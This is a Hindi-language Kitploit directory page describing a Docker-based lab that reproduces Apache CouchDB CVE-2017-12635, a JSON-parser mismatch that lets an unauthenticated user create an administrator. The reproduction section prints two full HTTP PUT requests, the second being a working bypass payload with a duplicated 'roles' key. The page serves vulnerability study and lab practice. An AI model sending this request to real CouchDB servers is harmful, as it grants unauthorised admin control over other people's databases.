Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Apache-couchdb-CVE-2017-12635 — Apache CouchDB CVE-2017-12635 के लिए डॉकर-आधारित पुनरुत्पादन वातावरण, JSON पार्सर असंगति के माध्यम से ऊर्ध्वाधर विशेषाधिकार वृद्धि, अप्रमाणित व्यवस्थापक निर्माण सक्षम करना। | Kitploit
उपकरण/GitHubGitHub/cyberharsh/apache-couchdb-cve-2017-12635
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलैब और अभ्यास
GitHubcyberharsh/apache-couchdb-cve-2017-12635

Apache-couchdb-CVE-2017-12635

Apache CouchDB CVE-2017-12635 के लिए डॉकर-आधारित पुनरुत्पादन वातावरण, JSON पार्सर असंगति के माध्यम से ऊर्ध्वाधर विशेषाधिकार वृद्धि, अप्रमाणित व्यवस्थापक निर्माण सक्षम करना।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1126 साल पहलेअभी तक समीक्षित नहीं

Couchdb ऊर्ध्वाधर अनुमति बाईपास भेद्यता (CVE-2017-12635)

Apache CouchDB एक ओपन सोर्स डेटाबेस है, जो उपयोग में आसानी और "वेब को पूरी तरह से अपनाने वाला डेटाबेस" होने पर केंद्रित है। यह एक NoSQL डेटाबेस है जो JSON को भंडारण प्रारूप, JavaScript को क्वेरी भाषा, MapReduce और HTTP को API के रूप में उपयोग करता है। इसका व्यापक उपयोग होता है, जैसे BBC ने अपने गतिशील सामग्री प्रदर्शन प्लेटफॉर्म पर, Credit Suisse ने अपने आंतरिक कमोडिटी विभाग के बाजार ढांचे में, Meebo ने अपने सोशल प्लेटफॉर्म (वेब और ऐप) में किया।

15 नवंबर 2017 को, CVE-2017-12635 और CVE-2017-12636 का खुलासा हुआ। CVE-2017-12635 Erlang और JavaScript द्वारा JSON पार्स करने के तरीके में अंतर के कारण उत्पन्न होता है, जिससे स्टेटमेंट निष्पादन में भिन्नता आती है। यह भेद्यता किसी भी उपयोगकर्ता को व्यवस्थापक बनाने की अनुमति देती है, जो एक ऊर्ध्वाधर अनुमति बाईपास भेद्यता है।

प्रभावित संस्करण: 1.7.0 से छोटे तथा 2.1.1 से छोटे

संदर्भ लिंक:

  • http://bobao.360.cn/learning/detail/4716.html
  • https://justi.cz/security/2017/11/14/couchdb-rce-npm.html

परीक्षण वातावरण

पर्यावरण को संकलित और प्रारंभ करें:

root@kitploit:~
docker-compose build
docker-compose up -d

पर्यावरण प्रारंभ होने के बाद, http://your-ip:5984/_utils/ पर जाएं, तो एक वेब पृष्ठ दिखाई देगा, जो इंगित करता है कि Couchdb सफलतापूर्वक प्रारंभ हो गया है। लेकिन हम पासवर्ड नहीं जानते, इसलिए लॉगिन नहीं कर सकते।

भेद्यता पुनरुत्पादन

सबसे पहले, निम्नलिखित डेटा पैकेट भेजें:

root@kitploit:~
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

देखा जा सकता है कि 403 त्रुटि लौटती है: {"error":"forbidden","reason":"Only _admin may set roles"} केवल व्यवस्थापक ही भूमिकाएँ सेट कर सकता है:

दो भूमिकाओं वाला डेटा पैकेट भेजने पर प्रतिबंध को बायपास किया जा सकता है:

root@kitploit:~
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

व्यवस्थापक सफलतापूर्वक बनाया गया, खाता और पासवर्ड दोनों vulhub हैं:

पुनः http://your-ip:5984/_utils/ पर जाएं, खाता और पासवर्ड vulhub दर्ज करें, सफलतापूर्वक लॉगिन कर सकते हैं:

टूल डाउनलोड करें